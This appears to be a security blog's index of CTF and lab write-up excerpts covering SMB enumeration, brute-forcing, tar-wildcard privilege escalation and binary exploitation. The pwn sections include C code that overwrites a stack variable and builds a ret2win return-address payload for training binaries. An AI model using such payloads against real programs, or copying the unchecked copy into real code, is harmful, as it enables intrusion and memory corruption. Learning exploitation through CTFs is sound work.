ZetechCTF

PWN Namelen This challenge was an easy buffer overflow where you had to fill the buffer with a specific set of characters. Using Ghidra we can actually see this: the main function calls another function called bufcheck(). Analyzing this function we see an if statement. The if statement first checks whether sVar1 == 0x14, i.e. the input length must be exactly 20. It also checks if the characters are i .

NEST

Machine info Nest is an easy difficulty Windows machine featuring an SMB server that permits guest access. The shares can be enumerated to gain credentials for a low privileged user. This user is found to have access to configuration files containing sensitive information. Another user and password is found through source code analysis, which is used to gain a foothold on the box. A custom service is found to be running, which is enumerated to find and decrypt Administrator credentials.

Perfectroot CTF 2024 Writeups

Introduction The p3rf3ctr00t CTF 2024 marked the debut of an exciting competition designed to challenge participants across diverse areas of cybersecurity. As one of the contributors to this event, I had the privilege of crafting some challenges that tested problem-solving skills. I will walk you through the design and solution of the challenges I created, providing insights into their concepts. Let’s learn. Flow First we are met with the challenge name Flow.

Gaar

Introduction In today’s post, we have another easy box from the OffSec playgrounds. The goal here was to use a mix of automated tools to brute-force the password of a user and get an initial foothold. Then we could escalate our privileges using a nice GTFOBins entry. Let’s learn. Enumeration cat nmap.txt # Nmap 7.94SVN scan initiated Thu Apr 25 18:43:07 2024 as: nmap -sVC -T4 -vv -oN nmap.txt 192.

Amaterasu

Introduction In this writeup we are going to check out a machine available on the OffSec playgrounds. The idea here was to learn how to use curl to upload files that would ultimately get us an initial foothold on the machine, and then use the classic tar wildcard trick to escalate our privileges. Let’s learn. Nmap sudo nmap -T4 -sVC 192.168.241.249 -oN nmap.txt -vv PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 61 vsftpd 3.

Chronicles

Introduction Today we have a medium box called Chronicle where we do some git forensics to recover a key that gives us user access to the machine, then a bit of browser forensics that enables us to move laterally as another user. There we find a binary that we can use to escalate our privileges. Here is the challenge link. Enumeration First of all we can start with some basic enumeration just to get a good idea of what our target looks like.

Surveillance

Step by step methodology Nmap scan First of all we can do some basic enumeration, such as checking for open ports, using a tool called nmap, which is used for network discovery and security auditing. We are also going to pass some options to the command; let us break them down first: -sVC: this combines two Nmap options, -sV (service and version detection) and -sC (default NSE scripts): -s: This prefix specifies the type of scan to perform.

KnightCTF

Get The Sword Can you get the sword ? Author : froghunter Download Link - 1 : https://drive.google.com/file/d/1HsQMxiZlP5978DzqnoZs6g6QOnCzVm_G/view Doing some basic file checks we see that the binary is a 32-bit LSB executable, which affects how we approach this challenge (4-byte addresses, cdecl calling convention with arguments on the stack). The binary is also dynamically linked and not stripped. dexter@lab:~/the-lab/knights/rev$ file get_sword get_sword: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=4a9b260935bf815a04350e3bb9e0e4422f504b2a, for GNU/Linux 4.

pwn102

102 Introduction For the next challenge we are required to modify a variable’s value through a buffer overflow. This occurs when data larger than the allocated memory space (buffer) is written into that buffer. As a result, it overwrites adjacent memory, including other variables. But if the stack grows downwards and the return address is above the buffer, shouldn’t the overflow write into the memory below it and not above, right? No. The stack grows downwards only in the sense that functions called later get their frames at lower addresses; within a frame, a write into a buffer proceeds from its start towards higher addresses. The saved return address was pushed before the locals were allocated, so it sits at a higher address than the local variables, and an overflow runs straight towards it and any locals laid out between.
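To make the layout argument concrete, here is an added example (not code from the original post or the challenge binary) that models a frame as raw bytes: a 16-byte input buffer at offset 0 with a 4-byte variable placed directly after it, as a compiler might lay out `char buf[16]; int target;`. The offsets and the initial value 0x11223344 are assumptions for the example; in the real binary the distance from the buffer to the variable is read off in a debugger, never guessed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN    16u   /* size of the input buffer (assumed) */
#define TARGET_OFF 16u   /* the variable sits right after the buffer (assumed) */
#define FRAME_LEN  20u   /* buffer + 4-byte target */

/* Read the 4-byte variable out of the frame image in native byte order. */
uint32_t read_target(const unsigned char *frame) {
    uint32_t v;
    memcpy(&v, frame + TARGET_OFF, sizeof v);
    return v;
}

static void set_target(unsigned char *frame, uint32_t v) {
    memcpy(frame + TARGET_OFF, &v, sizeof v);
}

/* The bug: every input byte is copied with no length check, the
 * gets()/strcpy() pattern. Input bytes 16..19 land on target, because
 * the copy moves towards higher addresses and target lives there. */
static void unsafe_copy(unsigned char *frame, const unsigned char *in, size_t len) {
    memcpy(frame, in, len);
}

/* Bounded variant: clamps to the buffer, so the extra bytes are dropped. */
static void bounded_copy(unsigned char *frame, const unsigned char *in, size_t len) {
    if (len > BUF_LEN) len = BUF_LEN;
    memcpy(frame, in, len);
}

/* Fill the buffer exactly, then append `desired` in native byte order
 * (little-endian on x86, the same bytes struct.pack("<I") would emit). */
static size_t build_payload(unsigned char *out, uint32_t desired) {
    memset(out, 'A', BUF_LEN);
    memcpy(out + BUF_LEN, &desired, sizeof desired);
    return BUF_LEN + sizeof desired;
}

/* Run the constructed payload through one of the copy routines and
 * report what target holds afterwards. */
uint32_t run_payload(uint32_t desired, int use_bounded) {
    unsigned char frame[FRAME_LEN];
    unsigned char payload[FRAME_LEN];
    memset(frame, 0, sizeof frame);
    set_target(frame, 0x11223344u);          /* initial value to beat (assumed) */
    size_t n = build_payload(payload, desired);
    if (use_bounded)
        bounded_copy(frame, payload, n);
    else
        unsafe_copy(frame, payload, n);
    return read_target(frame);
}

int main(void) {
    printf("unsafe copy : target = 0x%08x\n", run_payload(0xdeadbeefu, 0));
    printf("bounded copy: target = 0x%08x\n", run_payload(0xdeadbeefu, 1));
    return 0;
}
```

The unsafe path ends with target equal to the value smuggled in after the 16 filler bytes; the bounded path keeps 0x11223344. If the variable you need to change were laid out before the buffer instead, no amount of overflowing would reach it, which is why checking the frame layout in a disassembler or debugger comes before building the payload.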

pwn103

103 Introduction Here we are met by a ret2win challenge, which means we are required to call a function that the normal control flow never reaches, for example one that spawns a shell or, in a CTF, prints the flag. We can start with simple binary analysis, for example checking the binary protections using checksec. Let us break this down bit by bit. Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Arch: amd64-64-little This line specifies the architecture of the binary.
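The checksec output above tells us what shape the payload takes: no canary means the saved return address can be overwritten directly, NX means we cannot run shellcode on the stack and must redirect execution to existing code, and no PIE means the win function has a fixed address. The following added example (not code from the original post or the challenge) builds such a payload. The offset of 40 bytes, the win address 0x401196 and the `ret` gadget address 0x40101a are assumptions chosen for illustration; the real values come from measuring the crash offset and reading the symbol addresses out of the binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed numbers, for illustration only (not taken from the challenge):
 * the saved return address is 40 bytes from the start of the buffer
 * (32-byte buffer + 8-byte saved rbp), and with no PIE the win function
 * and a lone "ret" instruction have fixed addresses. */
#define RET_OFFSET 40u
#define WIN_ADDR   0x401196ull
#define RET_GADGET 0x40101aull

/* Store a 64-bit value little-endian, the way x86-64 keeps it on the stack. */
static void put_le64(unsigned char *dst, uint64_t v) {
    for (int i = 0; i < 8; i++)
        dst[i] = (unsigned char)(v >> (8 * i));
}

/* Load a little-endian 64-bit value (used to inspect the built payload). */
uint64_t get_le64(const unsigned char *src) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | src[i];
    return v;
}

/* Build a ret2win payload: filler up to the saved return address, an
 * optional lone "ret" to restore 16-byte stack alignment (glibc routines
 * such as system() or printf() can fault on a movaps otherwise), then the
 * win address. out must hold at least offset + 16 bytes; returns the
 * number of bytes written. */
size_t build_ret2win(unsigned char *out, size_t offset, uint64_t win,
                     uint64_t ret_gadget, int align) {
    memset(out, 'A', offset);
    size_t n = offset;
    if (align) {
        put_le64(out + n, ret_gadget);
        n += 8;
    }
    put_le64(out + n, win);
    return n + 8;
}

/* Helpers over the assumed numbers: total length, the 8-byte word at a
 * byte position, and a single byte (0x100 when out of range). */
size_t payload_len(int align) {
    unsigned char buf[RET_OFFSET + 16];
    return build_ret2win(buf, RET_OFFSET, WIN_ADDR, RET_GADGET, align);
}

uint64_t payload_word(int align, size_t pos) {
    unsigned char buf[RET_OFFSET + 16];
    size_t n = build_ret2win(buf, RET_OFFSET, WIN_ADDR, RET_GADGET, align);
    return pos + 8 <= n ? get_le64(buf + pos) : 0;
}

unsigned payload_byte(int align, size_t pos) {
    unsigned char buf[RET_OFFSET + 16];
    size_t n = build_ret2win(buf, RET_OFFSET, WIN_ADDR, RET_GADGET, align);
    return pos < n ? buf[pos] : 0x100u;
}

int main(void) {
    unsigned char buf[RET_OFFSET + 16];
    size_t n = build_ret2win(buf, RET_OFFSET, WIN_ADDR, RET_GADGET, 1);
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", buf[i], (i + 1) % 16 ? " " : "\n");
    printf("\n");
    return 0;
}
```

Write the bytes to a file and feed them to the binary on stdin (or over the socket for the remote instance). If the win function is reached but the process dies inside a libc call, rebuild with `align` set so the extra `ret` fixes the stack alignment before the call.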